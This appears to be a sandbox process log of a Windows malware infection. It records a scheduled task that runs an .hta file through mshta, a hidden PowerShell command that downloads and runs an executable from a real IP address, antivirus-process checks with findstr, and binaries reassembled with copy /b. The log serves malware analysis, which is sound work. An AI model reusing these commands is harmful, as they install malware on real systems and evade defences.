cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
2624
schtasks.exe schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
2728
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
2828
TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE "C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE"
3024
790548e77c.exe "C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe"
2760
13Z5sqy.exe "C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe"
2792
jonbDes.exe "C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe"
3004
findstr.exe findstr /I "opssvc wrsa"
2204
tasklist.exe tasklist
2108
tasklist.exe tasklist
1064
findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
2644
cmd.exe cmd /c md 764661
740
extrac32.exe extrac32 /Y /E Fm
2804
findstr.exe findstr /V "Tunnel" Addresses
2984
cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
3036
cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
1484
Macromedia.com Macromedia.com F
1728
choice.exe choice /d y /t 15
828
up7d8Ym.exe "C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe"
2696
012Bdpb.exe "C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe"
2744
7fOMOTQ.exe "C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe"
2056
Bjkm5hE.exe "C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
3028
explorer.exe C:\Windows\Explorer.EXE
1452